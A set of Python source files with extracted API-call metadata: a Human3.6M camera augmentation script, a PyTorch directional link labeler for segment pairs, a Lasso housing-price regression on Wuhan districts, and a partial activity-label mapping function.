'(reducedLikescount)\n', (13304, 13323), False, 'from scipy import stats\n'), ((13336, 13386), 'scipy.stats.lognorm.pdf', 'stats.lognorm.pdf', (['l', 'param[0]', 'param[1]', 'param[2]'], {}), '(l, param[0], param[1], param[2])\n', (13353, 13386), False, 'from scipy import stats\n'), ((13394, 13406), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (13404, 13406), True, 'import matplotlib.pyplot as plt\n'), ((13407, 13456), 'matplotlib.pyplot.hist', 'plt.hist', (['reducedLikescount'], {'bins': 'l', 'density': '(True)'}), '(reducedLikescount, bins=l, density=True)\n', (13415, 13456), True, 'import matplotlib.pyplot as plt\n'), ((13457, 13485), 'matplotlib.pyplot.plot', 'plt.plot', (['l', 'pdfFitted', '"""r-"""'], {}), "(l, pdfFitted, 'r-')\n", (13465, 13485), True, 'import matplotlib.pyplot as plt\n'), ((13486, 13516), 'matplotlib.pyplot.title', 'plt.title', (['"""Ước lượng phân bố"""'], {}), "('Ước lượng phân bố')\n", (13495, 13516), True, 'import matplotlib.pyplot as plt\n'), ((13573, 13593), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mật độ"""'], {}), "('Mật độ')\n", (13583, 13593), True, 'import matplotlib.pyplot as plt\n'), ((13603, 13652), 'scipy.stats.kstest', 'stats.kstest', (['reducedLikescount', '"""lognorm"""', 'param'], {}), "(reducedLikescount, 'lognorm', param)\n", (13615, 13652), False, 'from scipy import stats\n'), ((13846, 13856), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13854, 13856), True, 'import matplotlib.pyplot as plt\n'), ((17459, 17473), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17471, 17473), True, 'import matplotlib.pyplot as plt\n'), ((17481, 17504), 'numpy.arange', 'np.arange', (['(0)', '(3500)', '(100)'], {}), '(0, 3500, 100)\n', (17490, 17504), True, 'import numpy as np\n'), ((17727, 17741), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17739, 17741), True, 'import matplotlib.pyplot as plt\n'), ((16958, 16980), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (16972, 16980), True, 'import numpy as np\n'), ((18336, 18350), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (18348, 18350), True, 'import matplotlib.pyplot as plt\n'), ((18815, 18827), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18825, 18827), True, 'import matplotlib.pyplot as plt\n'), ((2469, 2484), 'numpy.size', 'np.size', (['series'], {}), '(series)\n', (2476, 2484), True, 'import numpy as np\n'), ((3958, 4002), 'pandas.Grouper', 'pd.Grouper', ([], {'freq': '"""M"""', 'key': '"""created_time_utc"""'}), "(freq='M', key='created_time_utc')\n", (3968, 4002), True, 'import pandas as pd\n'), ((8039, 8079), 'pandas.Grouper', 'pd.Grouper', ([], {'freq': '"""M"""', 'key': '"""created_time"""'}), "(freq='M', key='created_time')\n", (8049, 8079), True, 'import pandas as pd\n'), ((1168, 1245), 'pandas.to_datetime', 'pd.to_datetime', (["df['created_time']"], {'format': '"""%Y-%m-%dT%H:%M:%S.000Z"""', 'utc': '(True)'}), "(df['created_time'], format='%Y-%m-%dT%H:%M:%S.000Z', utc=True)\n", (1182, 1245), True, 'import pandas as pd\n'), ((1300, 1355), 'pandas.to_datetime', 'pd.to_datetime', (["df['r_created_utc']"], {'unit': '"""s"""', 'utc': '(True)'}), "(df['r_created_utc'], unit='s', utc=True)\n", (1314, 1355), True, 'import pandas as pd\n')]
import os import sys sys.path.append(os.path.join(os.path.dirname(__file__), '..')) from lib.camera.camera import CameraInfoPacket, catesian2homogenous import ipdb import copy import json import numpy as np from camera_augmentation import h36m_cameras_intrinsic_params from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame H36M_KPT_IDX = [0, 1, 2, 3, 6, 7, 8, 12, 13, 14, 15, 17, 18, 19, 25, 26, 27] RES_W, RES_H = 1000, 1000 AXIS_X, AXIS_Y, AXIS_Z = [1, 0, 0], [0, 1, 0], [0, 0, 1] TRAIN_SUBJECTS = ['S1', 'S5', 'S6', 'S7', 'S8'] TEST_SUBJECTS = ['S9', 'S11'] IDX_TO_CAMERA = { 0: '54138969', 1: '55011271', 2: '58860488', 3: '60457274' } if __name__ == '__main__': FILE_TO_3D_POSE = '/ssd/yzhan/data/benchmark/3D/h36m/annotations/gt/data_3d_h36m.npz' PATH_TO_OUTPUT = '/ssd/ray3d/camera.intrinsic' SUBJECT = 'S1' YAW = 0 TRANSLATION = 2.0 PITCH = 0 CENTER_POINT = [0, 0, 1.8] FOCAL_LENGTH_BAIS_RANGE = (np.arange(-50, 50, 10)).tolist() CENTER_POINT_BAIS_RANGE = (np.arange(-50, 50, 10)).tolist() cam_idx = 1 # '55011271' camera_info = init_camera_h36m() camera_pose = get_camera_pose(camera_info) pose_3d = np.load(FILE_TO_3D_POSE, allow_pickle=True)['positions_3d'].item() selected_cam = copy.deepcopy(camera_info[SUBJECT][cam_idx]) Rw2c = selected_cam.Rw2c Tw2c = selected_cam.Tw2c t = np.array(CENTER_POINT).reshape(3, 1) # translation Tw2c_translation_aumented = camera_translation(Tw2c, t, TRANSLATION) # rotation yaw = convertdegree2euler(YAW) Rw2c_rotation_augmented, Tw2c_rotation_augmented = rotate_camera(Rw2c, Tw2c_translation_aumented, t, np.array(AXIS_Z), yaw) # pitch pitch = convertdegree2euler(PITCH) camera_position = - np.dot(Rw2c_rotation_augmented.T, Tw2c_rotation_augmented) axis = np.array([-camera_position[1][0], camera_position[0][0], 0]) Rw2c_pitch_augmented, Tw2c_pitch_augmented = rotate_camera(Rw2c_rotation_augmented, Tw2c_rotation_augmented, t, axis, pitch) camera_position = - np.dot(Rw2c_pitch_augmented.T, Tw2c_pitch_augmented) # change the focal length of intrinsic for f_bais in FOCAL_LENGTH_BAIS_RANGE: for c_bias in CENTER_POINT_BAIS_RANGE: K, dist_coeff = get_intrinsic(cam_idx, fx_bais=f_bais, fy_bais=f_bais, cx_bias=c_bias, cy_bias=c_bias) camera_augmented = CameraInfoPacket( P=None, K=K, R=Rw2c_pitch_augmented, t=Tw2c_pitch_augmented, dist_coeff=dist_coeff ) # sanity check invalid = False pose_2d = {} for sbj in pose_3d.keys(): pose_2d.setdefault(sbj, dict()) for act in pose_3d[sbj].keys(): pose_2d[sbj].setdefault(act, list()) kpt_3d = pose_3d[sbj][act][:, H36M_KPT_IDX] kpt_3d_hom = catesian2homogenous(kpt_3d) kpt_2d = camera_augmented.project(kpt_3d_hom) pose_2d[sbj][act].append(kpt_2d) if not check_in_frame(kpt_2d, RES_W, RES_H): invalid = True break if invalid: break if invalid: del pose_2d continue print('\tcam_idx:{}, FBAIS: {}, CBAIS: {}'.format(cam_idx, f_bais, c_bias)) CAMERA_PARAM_PATH = os.path.join(PATH_TO_OUTPUT, '{}'.format('json')) POSE_2D_PATH = os.path.join(PATH_TO_OUTPUT, '{}'.format('npz')) mkdirs(CAMERA_PARAM_PATH) mkdirs(POSE_2D_PATH) cameras_params = [] camera_param = {} camera_param['id'] = h36m_cameras_intrinsic_params[cam_idx]['id'] camera_param['center'] = [camera_augmented.K[0, 2], camera_augmented.K[1, 2]] camera_param['focal_length'] = [camera_augmented.K[0, 0], camera_augmented.K[1, 1]] camera_param['radial_distortion'] = h36m_cameras_intrinsic_params[cam_idx]['radial_distortion'] camera_param['tangential_distortion'] = h36m_cameras_intrinsic_params[cam_idx]['tangential_distortion'] camera_param['res_w'] = h36m_cameras_intrinsic_params[cam_idx]['res_w'] camera_param['res_h'] = h36m_cameras_intrinsic_params[cam_idx]['res_h'] camera_param['azimuth'] = h36m_cameras_intrinsic_params[cam_idx]['azimuth'] camera_param['R'] = Rw2c_pitch_augmented.tolist() camera_param['translation'] = Tw2c_pitch_augmented.tolist() # save camera parameter CAMERA_FILENAME = os.path.join(CAMERA_PARAM_PATH, 'TRANSLATION{}_YAW{}_PITCH{}_CAM{}_FBAIS{}_CBIAS{}.json'.format( TRANSLATION, YAW, PITCH, cam_idx, f_bais, c_bias)) with open(CAMERA_FILENAME, 'w') as file_obj: json.dump([camera_param], file_obj, indent=4) # save projected 2d pose POSE2D_FILENAME = os.path.join(POSE_2D_PATH, 'TRANSLATION{}_YAW{}_PITCH{}_CAM{}_FBAIS{}_CBIAS{}.npz'.format( TRANSLATION, YAW, PITCH, cam_idx, f_bais, c_bias)) METADATA = { 'layout': 'h36m_aug', 'num_joints': 17, 'keypoints_symmetry': [[4, 5, 6, 11, 12, 13], [1, 2, 3, 14, 15, 16]] } np.savez(POSE2D_FILENAME, metadata=METADATA, positions_2d=pose_2d) del pose_2d
[ "camera_augmentation.get_intrinsic", "json.dump", "copy.deepcopy", "numpy.load", "numpy.savez", "lib.camera.camera.catesian2homogenous", "os.path.dirname", "camera_augmentation.rotate_camera", "camera_augmentation.check_in_frame", "camera_augmentation.camera_translation", "lib.camera.camera.CameraInfoPacket", "numpy.array", "numpy.arange", "numpy.dot", "camera_augmentation.convertdegree2euler", "camera_augmentation.get_camera_pose", "camera_augmentation.init_camera_h36m", "camera_augmentation.mkdirs" ]
[((1249, 1267), 'camera_augmentation.init_camera_h36m', 'init_camera_h36m', ([], {}), '()\n', (1265, 1267), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1286, 1314), 'camera_augmentation.get_camera_pose', 'get_camera_pose', (['camera_info'], {}), '(camera_info)\n', (1301, 1314), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1416, 1460), 'copy.deepcopy', 'copy.deepcopy', (['camera_info[SUBJECT][cam_idx]'], {}), '(camera_info[SUBJECT][cam_idx])\n', (1429, 1460), False, 'import copy\n'), ((1615, 1655), 'camera_augmentation.camera_translation', 'camera_translation', (['Tw2c', 't', 'TRANSLATION'], {}), '(Tw2c, t, TRANSLATION)\n', (1633, 1655), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1682, 1706), 'camera_augmentation.convertdegree2euler', 'convertdegree2euler', (['YAW'], {}), '(YAW)\n', (1701, 1706), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((1929, 1955), 'camera_augmentation.convertdegree2euler', 'convertdegree2euler', (['PITCH'], {}), '(PITCH)\n', (1948, 1955), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((2051, 2111), 'numpy.array', 'np.array', (['[-camera_position[1][0], camera_position[0][0], 0]'], {}), '([-camera_position[1][0], camera_position[0][0], 0])\n', (2059, 2111), True, 'import numpy as np\n'), ((2161, 2240), 'camera_augmentation.rotate_camera', 'rotate_camera', (['Rw2c_rotation_augmented', 'Tw2c_rotation_augmented', 't', 'axis', 'pitch'], {}), '(Rw2c_rotation_augmented, Tw2c_rotation_augmented, t, axis, pitch)\n', (2174, 2240), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((51, 76), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (66, 76), False, 'import os\n'), ((1881, 1897), 'numpy.array', 'np.array', (['AXIS_Z'], {}), '(AXIS_Z)\n', (1889, 1897), True, 'import numpy as np\n'), ((1980, 2038), 'numpy.dot', 'np.dot', (['Rw2c_rotation_augmented.T', 'Tw2c_rotation_augmented'], {}), '(Rw2c_rotation_augmented.T, Tw2c_rotation_augmented)\n', (1986, 2038), True, 'import numpy as np\n'), ((2328, 2380), 'numpy.dot', 'np.dot', (['Rw2c_pitch_augmented.T', 'Tw2c_pitch_augmented'], {}), '(Rw2c_pitch_augmented.T, Tw2c_pitch_augmented)\n', (2334, 2380), True, 'import numpy as np\n'), ((1103, 1125), 'numpy.arange', 'np.arange', (['(-50)', '(50)', '(10)'], {}), '(-50, 50, 10)\n', (1112, 1125), True, 'import numpy as np\n'), ((1167, 1189), 'numpy.arange', 'np.arange', (['(-50)', '(50)', '(10)'], {}), '(-50, 50, 10)\n', (1176, 1189), True, 'import numpy as np\n'), ((1527, 1549), 'numpy.array', 'np.array', (['CENTER_POINT'], {}), '(CENTER_POINT)\n', (1535, 1549), True, 'import numpy as np\n'), ((2545, 2635), 'camera_augmentation.get_intrinsic', 'get_intrinsic', (['cam_idx'], {'fx_bais': 'f_bais', 'fy_bais': 'f_bais', 'cx_bias': 'c_bias', 'cy_bias': 'c_bias'}), '(cam_idx, fx_bais=f_bais, fy_bais=f_bais, cx_bias=c_bias,\n cy_bias=c_bias)\n', (2558, 2635), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((2663, 2768), 'lib.camera.camera.CameraInfoPacket', 'CameraInfoPacket', ([], {'P': 'None', 'K': 'K', 'R': 'Rw2c_pitch_augmented', 't': 'Tw2c_pitch_augmented', 'dist_coeff': 'dist_coeff'}), '(P=None, K=K, R=Rw2c_pitch_augmented, t=\n Tw2c_pitch_augmented, dist_coeff=dist_coeff)\n', (2679, 2768), False, 'from lib.camera.camera import CameraInfoPacket, catesian2homogenous\n'), ((3837, 3862), 'camera_augmentation.mkdirs', 'mkdirs', (['CAMERA_PARAM_PATH'], {}), '(CAMERA_PARAM_PATH)\n', (3843, 3862), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((3875, 3895), 'camera_augmentation.mkdirs', 'mkdirs', (['POSE_2D_PATH'], {}), '(POSE_2D_PATH)\n', (3881, 3895), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((5865, 5931), 'numpy.savez', 'np.savez', (['POSE2D_FILENAME'], {'metadata': 'METADATA', 'positions_2d': 'pose_2d'}), '(POSE2D_FILENAME, metadata=METADATA, positions_2d=pose_2d)\n', (5873, 5931), True, 'import numpy as np\n'), ((1329, 1372), 'numpy.load', 'np.load', (['FILE_TO_3D_POSE'], {'allow_pickle': '(True)'}), '(FILE_TO_3D_POSE, allow_pickle=True)\n', (1336, 1372), True, 'import numpy as np\n'), ((5264, 5309), 'json.dump', 'json.dump', (['[camera_param]', 'file_obj'], {'indent': '(4)'}), '([camera_param], file_obj, indent=4)\n', (5273, 5309), False, 'import json\n'), ((3164, 3191), 'lib.camera.camera.catesian2homogenous', 'catesian2homogenous', (['kpt_3d'], {}), '(kpt_3d)\n', (3183, 3191), False, 'from lib.camera.camera import CameraInfoPacket, catesian2homogenous\n'), ((3338, 3374), 'camera_augmentation.check_in_frame', 'check_in_frame', (['kpt_2d', 'RES_W', 'RES_H'], {}), '(kpt_2d, RES_W, RES_H)\n', (3352, 3374), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n')]
# basics from typing import List, Tuple, DefaultDict, Dict, Union from collections import defaultdict import pandas as pd import numpy as np # pytorch import torch from torch import Tensor import torch.nn as nn import torch.nn.functional as F #segnlp from segnlp import utils class DirLinkLabeler(nn.Module): """ Direktional Link Labeler work on the level of all possible pairs. It takes all bi-directional pairs between segments and predicts the directional labels including None for no link and root for pointing to itself. """ def __init__(self, input_size:int, output_size:int, match_threshold : float = 0.5, loss_reduction = "mean", ignore_index = -1, weight_init : Union[str, dict] = None, ): super().__init__() self.loss_reduction = loss_reduction self.ignore_index = ignore_index self.match_threshold = match_threshold # if we have link labels {root, REL1, REL2} we will predict the folowing labels # {None, root, REL1, REL2, REL1-rev, REL2-rev} # 0 1 2 3 4 5 self.link_labels_wo_root = output_size -1 self.rev_label_treshhold = output_size output_size = ((output_size -1) * 2 ) + 2 self.clf = nn.Linear(input_size, output_size) utils.init_weights(self, weight_init) def __get_preds(self, logits: Tensor, pair_p1: Tensor, pair_p2: Tensor, sample_id: Tensor ): # we take the max value and labels for each of the Link labels v, l = torch.max(logits, dim=-1) pair_p1 = utils.ensure_numpy(pair_p1) pair_p2 = utils.ensure_numpy(pair_p2) #then we build a df df = pd.DataFrame( { "value": v.detach().numpy(), "label": l.detach().numpy(), "p1": pair_p1, "p2": pair_p2, } ) # for each pair where the prediction is a X-rev relation we need to swap the order of the # member of the pair. I.e. if we have a pair ( p1, p2) where the label is X-rev we swap places # on p1 and p2. What this does is make p1 our column for SOURCE and p2 our column for TARGET. # this means that the value of p2 is the index of all the segments in a sample p1 is related to. p1_p2 = df.loc[:, ["p1", "p2"]].to_numpy() p1_p2_new = np.zeros_like(p1_p2) rev_preds_filter = (df["label"] > self.rev_label_treshhold).to_numpy() p1_p2_new[rev_preds_filter, 0] = p1_p2[rev_preds_filter, 1] p1_p2_new[rev_preds_filter, 1] = p1_p2[rev_preds_filter, 0] p1_p2_new[~rev_preds_filter, 0] = p1_p2[~rev_preds_filter, 0] p1_p2_new[~rev_preds_filter, 1] = p1_p2[~rev_preds_filter, 1] df.loc[:, ["p1", "p2"]] = p1_p2_new #after we have set SOURCE and TARGETS we normalize the link_labels to non-"-Rev" labels df.loc[rev_preds_filter, "label"] -= self.link_labels_wo_root # We can filter out all pair where prediction is 0 ( None), which means that the pairs # are predicted to not link, (or more correct "there is no relation between"). # However, each segments needs to link to something however, because we can predict 0 # for all pairs with a certain source, we need to set the label for those pairs to a # default value, i.e. themselves. SO, for each segments where all predictions are 0, we set the # link to be equal to itself. no_link = df["label"] != 0 self_refs = df["p1"] == df["p2"] cond = np.logical_or(no_link, self_refs) df.loc[cond, "label"] = 1 # set the label to root df = df[cond] # remove all rows where label == 0 except where p1 == p2 #as we also move down labels by 1 so thay we are matching original layers, .e.g. None is # not a valid link_label df.loc[:, "label"] -= 1 # Lastly we want to sort all the pairs then select the row for # for each unique p1, starting segments. I.e. we get the highested scored # link and link_label for any unqiue segment p1 df.sort_values(by=['value'], inplace=True, ascending=False) seg_df = df.groupby("p1").first() # lastly, we need to turn p2 inte link, i.e. p2 refer to an unique seg in the batch # but links needs to be a index to a segment in a sample # To normalize p2 we subtract with the utils.cumsum_zero() of all sample segment lengths # I.e. the start of the global segment id for each sample lengths_segs = pd.DataFrame({"p1": pair_p1, "sample_id":sample_id}).groupby("sample_id", sort = False)["p1"].nunique().to_numpy() g_seg_starts = utils.np_cumsum_zero(lengths_segs) seg_df["link"] = seg_df.pop("p2") - np.repeat(g_seg_starts, lengths_segs) link_label_preds = seg_df["label"].to_numpy() links = seg_df["link"].to_numpy() return link_label_preds, links def forward(self, input:Tensor, pair_p1 : Tensor, pair_p2 : Tensor, sample_id: Tensor, ): logits = self.clf(input) link_labels, links = self.__get_preds( logits = logits, pair_p1 = pair_p1, pair_p2 = pair_p2, sample_id = sample_id, ) return logits, link_labels, links def loss(self, targets: Tensor, logits: Tensor, directions: Tensor, true_link: Tensor, p1_match_ratio: Tensor, p2_match_ratio: Tensor ): # creating a mask over all pairs which tells us which pairs include a segments # which is not a TRUE segment, i.e. overlaps with a ground truth segments to a certain # configurable extent cond1 = p1_match_ratio >= self.match_threshold cond2 = p2_match_ratio >= self.match_threshold true_segs = torch.logical_and( cond1, cond2, ) # then we combine the true_seg mask with true link mask and negate it so we have a mask # which is True on each position the pair should be a NEGATIVE SAMPLE neg_mask = ~torch.logical_and( true_segs, true_link ) # target labels are not directional so we need to make them so. Targets also lack # label for no link. So, we first add 1 too all labels moving them up freeing 0 for None label for no links. # then for all directions which are 2 (backwards/reversed) we add the number of link_labels (minus root) targets += 1 targets[directions == 2] += self.link_labels_wo_root # neg_mask include all the pairs which should be countet as non linking pairs, e.g. label None. # this mask is usually created from all segs that are not linked or pairs that include segments which # are not true segments. targets[neg_mask] = 0 loss = F.cross_entropy( logits, targets, reduction=self.loss_reduction, ignore_index=self.ignore_index ) return loss
[ "pandas.DataFrame", "numpy.zeros_like", "segnlp.utils.np_cumsum_zero", "torch.nn.functional.cross_entropy", "segnlp.utils.ensure_numpy", "torch.nn.Linear", "torch.max", "numpy.logical_or", "numpy.repeat", "segnlp.utils.init_weights", "torch.logical_and" ]
[((1376, 1410), 'torch.nn.Linear', 'nn.Linear', (['input_size', 'output_size'], {}), '(input_size, output_size)\n', (1385, 1410), True, 'import torch.nn as nn\n'), ((1419, 1456), 'segnlp.utils.init_weights', 'utils.init_weights', (['self', 'weight_init'], {}), '(self, weight_init)\n', (1437, 1456), False, 'from segnlp import utils\n'), ((1746, 1771), 'torch.max', 'torch.max', (['logits'], {'dim': '(-1)'}), '(logits, dim=-1)\n', (1755, 1771), False, 'import torch\n'), ((1790, 1817), 'segnlp.utils.ensure_numpy', 'utils.ensure_numpy', (['pair_p1'], {}), '(pair_p1)\n', (1808, 1817), False, 'from segnlp import utils\n'), ((1836, 1863), 'segnlp.utils.ensure_numpy', 'utils.ensure_numpy', (['pair_p2'], {}), '(pair_p2)\n', (1854, 1863), False, 'from segnlp import utils\n'), ((2700, 2720), 'numpy.zeros_like', 'np.zeros_like', (['p1_p2'], {}), '(p1_p2)\n', (2713, 2720), True, 'import numpy as np\n'), ((3907, 3940), 'numpy.logical_or', 'np.logical_or', (['no_link', 'self_refs'], {}), '(no_link, self_refs)\n', (3920, 3940), True, 'import numpy as np\n'), ((5051, 5085), 'segnlp.utils.np_cumsum_zero', 'utils.np_cumsum_zero', (['lengths_segs'], {}), '(lengths_segs)\n', (5071, 5085), False, 'from segnlp import utils\n'), ((6444, 6475), 'torch.logical_and', 'torch.logical_and', (['cond1', 'cond2'], {}), '(cond1, cond2)\n', (6461, 6475), False, 'import torch\n'), ((7654, 7753), 'torch.nn.functional.cross_entropy', 'F.cross_entropy', (['logits', 'targets'], {'reduction': 'self.loss_reduction', 'ignore_index': 'self.ignore_index'}), '(logits, targets, reduction=self.loss_reduction,\n ignore_index=self.ignore_index)\n', (7669, 7753), True, 'import torch.nn.functional as F\n'), ((5130, 5167), 'numpy.repeat', 'np.repeat', (['g_seg_starts', 'lengths_segs'], {}), '(g_seg_starts, lengths_segs)\n', (5139, 5167), True, 'import numpy as np\n'), ((6784, 6823), 'torch.logical_and', 'torch.logical_and', (['true_segs', 'true_link'], {}), '(true_segs, true_link)\n', (6801, 6823), False, 'import torch\n'), ((4912, 4965), 'pandas.DataFrame', 'pd.DataFrame', (["{'p1': pair_p1, 'sample_id': sample_id}"], {}), "({'p1': pair_p1, 'sample_id': sample_id})\n", (4924, 4965), True, 'import pandas as pd\n')]
import logging import numpy as np import pandas as pd from sklearn import linear_model RESOURCE_DIR = '/home/lucasx/PycharmProjects/DataHouse/DataSet/' logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s \t', level=logging.INFO, filemode='a', filename='loginfo.log') def train_and_predict(filepath): df = pd.read_excel(filepath, 'HouseInfo') def _preprocessing(dataframe): dataframe['buildYear'] = dataframe['buildYear'].fillna(np.median(dataframe['buildYear'].dropna())) label_and_value = { "武昌": 1, "江岸": 2, "江汉": 3, "硚口": 4, "洪山": 5, "青山": 6, "汉阳": 7, "东西湖": 8, "沌口开发区": 9, "江夏": 10, "黄陂": 11, "其他": 12, "蔡甸": 13, "汉南": 14, "新洲": 15 } dataframe['areaCode'] = [label_and_value[i] for i in dataframe['area']] return dataframe df = _preprocessing(dataframe=df).loc[:, ['areaCode', 'buildYear', 'saleNum', 'midPrice']] df.to_excel(RESOURCE_DIR + 'data.xlsx', sheet_name='Sheet1') X_digits = df.loc[:, ['areaCode', 'buildYear', 'saleNum']] y_digits = df.loc[:, ['midPrice']] regression = linear_model.Lasso(alpha=0.1) # do cross-validation X_folds = np.array_split(X_digits, 10) y_folds = np.array_split(y_digits, 10) scores = list() for k in range(10): X_train = list(X_folds) X_test = X_train.pop(k) X_train = np.concatenate(X_train) y_train = list(y_folds) y_test = y_train.pop(k) y_train = np.concatenate(y_train) scores.append(regression.fit(X_train, y_train).score(X_test, y_test)) logging.info(scores) from sklearn.externals import joblib joblib.dump(regression, RESOURCE_DIR + 'reg_model.pkl') print( 'The max inference accuracy is {:%}'.format(np.array(scores).max())) def inference(areaCode, buildYear, saleNum): from sklearn.externals import joblib regression = joblib.load(RESOURCE_DIR + 'reg_model.pkl') predict_price = regression.predict(np.array([areaCode, buildYear, saleNum]).reshape(1, 3)) return predict_price if __name__ == '__main__': # train_and_predict(RESOURCE_DIR + 'anjuke.xlsx') price = inference(1, 2015, 1611) print('Your house worths %d RMB.' % price)
[ "sklearn.externals.joblib.dump", "numpy.concatenate", "logging.basicConfig", "pandas.read_excel", "logging.info", "numpy.array", "sklearn.externals.joblib.load", "numpy.array_split", "sklearn.linear_model.Lasso" ]
[((154, 286), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(asctime)s:%(message)s \t"""', 'level': 'logging.INFO', 'filemode': '"""a"""', 'filename': '"""loginfo.log"""'}), "(format='%(levelname)s:%(asctime)s:%(message)s \\t',\n level=logging.INFO, filemode='a', filename='loginfo.log')\n", (173, 286), False, 'import logging\n'), ((347, 383), 'pandas.read_excel', 'pd.read_excel', (['filepath', '"""HouseInfo"""'], {}), "(filepath, 'HouseInfo')\n", (360, 383), True, 'import pandas as pd\n'), ((1276, 1305), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1294, 1305), False, 'from sklearn import linear_model\n'), ((1347, 1375), 'numpy.array_split', 'np.array_split', (['X_digits', '(10)'], {}), '(X_digits, 10)\n', (1361, 1375), True, 'import numpy as np\n'), ((1390, 1418), 'numpy.array_split', 'np.array_split', (['y_digits', '(10)'], {}), '(y_digits, 10)\n', (1404, 1418), True, 'import numpy as np\n'), ((1757, 1777), 'logging.info', 'logging.info', (['scores'], {}), '(scores)\n', (1769, 1777), False, 'import logging\n'), ((1824, 1879), 'sklearn.externals.joblib.dump', 'joblib.dump', (['regression', "(RESOURCE_DIR + 'reg_model.pkl')"], {}), "(regression, RESOURCE_DIR + 'reg_model.pkl')\n", (1835, 1879), False, 'from sklearn.externals import joblib\n'), ((2074, 2117), 'sklearn.externals.joblib.load', 'joblib.load', (["(RESOURCE_DIR + 'reg_model.pkl')"], {}), "(RESOURCE_DIR + 'reg_model.pkl')\n", (2085, 2117), False, 'from sklearn.externals import joblib\n'), ((1545, 1568), 'numpy.concatenate', 'np.concatenate', (['X_train'], {}), '(X_train)\n', (1559, 1568), True, 'import numpy as np\n'), ((1651, 1674), 'numpy.concatenate', 'np.concatenate', (['y_train'], {}), '(y_train)\n', (1665, 1674), True, 'import numpy as np\n'), ((2157, 2197), 'numpy.array', 'np.array', (['[areaCode, buildYear, saleNum]'], {}), '([areaCode, buildYear, saleNum])\n', (2165, 2197), True, 'import numpy as np\n'), ((1944, 1960), 'numpy.array', 'np.array', (['scores'], {}), '(scores)\n', (1952, 1960), True, 'import numpy as np\n')]
from .. import moment from .. import mhealth_format as mh import numpy as np import pkg_resources import pandas as pd from loguru import logger def _get_annotation_durations(annot_df): durations = annot_df.groupby(annot_df.columns[3]).apply( lambda rows: np.sum(rows.iloc[:, 2] - rows.iloc[:, 1])) return durations def _annot_to_activity(annot_df, pid, start_time, stop_time): if annot_df is None: return "Unknown" if annot_df.shape[0] == 0: return "Unknown" label_list = annot_df[mh.ANNOTATION_LABEL_COL].str.lower() annot_df[mh.ANNOTATION_LABEL_COL] = label_list annot_df = annot_df.loc[(label_list != 'wear on') & (label_list != 'wearon'), :] if annot_df.shape[0] == 0: return "Unknown" labels = annot_df.iloc[:, 3].unique() labels.sort() label = ' '.join(labels).lower().strip() # filter if it does not cover the entire 12.8s durations = _get_annotation_durations(annot_df) interval = int(moment.Moment.get_duration( start_time, stop_time, unit='ms')) if not np.all(durations.values >= np.timedelta64(interval, 'ms')): return "Transition" # special cases if pid == 'SPADES_26': if 'biking' in label and start_time.hour == 11 and stop_time.minute > 26: return "Stationary cycle ergometry" elif pid == 'SPADES_19': if '3 mph' in label and 'arms on desk' in label and 'treadmill' in label: return "Level treadmill walking at 3 mph with arms on desk" if 'stairs' in label and 'up' in label: return 'Walking upstairs' elif 'stairs' in label and 'down' in label: return 'Walking downstairs' if 'mbta' in label or 'city' in label or 'outdoor' in label: return 'Unknown' if "sitting" in label and 'writing' in label: return 'Sitting and writing' elif 'stand' in label and 'writ' in label: return 'Standing and writing at a table' elif 'sit' in label and ('web' in label or 'typ' in label): return 'Sitting and typing on a keyboard' elif 'reclin' in label and ('text' in label or 'web' in label): return 'Reclining and using phone' elif 'sit' in label and 'story' in label and ('city' not in label and 'outdoor' not in label): return "Sitting and talking" elif "reclin" in label and 'story' in label: return 'Reclining and talking' elif "stand" in label and ('web' in label or 'typ' in label): return "Standing and typing on a keyboard" elif 'bik' in label and ('stationary' in label or '300' in label): return "Stationary cycle ergometry" elif ('treadmill' in label or 'walk' in label) and '1' in label: return "Level treadmill walking at 1 mph with arms on desk" elif ('treadmill' in label or 'walk' in label) and '2' in label: return "Level treadmill walking at 2 mph with arms on desk" elif 'treadmill' in label and 'phone' in label: return "Level treadmill walking at 3-3.5 mph while holding a phone to the ear and talking" elif 'treadmill' in label and 'bag' in label: return "Level treadmill walking at 3-3.5 mph and carrying a bag" elif 'treadmill' in label and 'story' in label: return "Level treadmill walking at 3-3.5 mph while talking" elif ('treadmill' in label or 'walk' in label) and 'drink' in label: return 'Level treadmill walking at 3-3.5 mph and carrying a drink' elif ('treadmill' in label or 'walk' in label) and ('3.5' in label or '3' in label): return 'Level treadmill walking at 3-3.5 mph' elif '5.5' in label or 'jog' in label or 'run' in label: return 'Treadmill running at 5.5 mph & 5% grade' elif 'laundry' in label: return 'Standing and folding towels' elif 'sweep' in label: return 'Standing and sweeping' elif 'shelf' in label and 'load' in label: return 'Standing loading/unloading shelf' elif 'lying' in label: return "Lying on the back" elif label == 'sitting' or 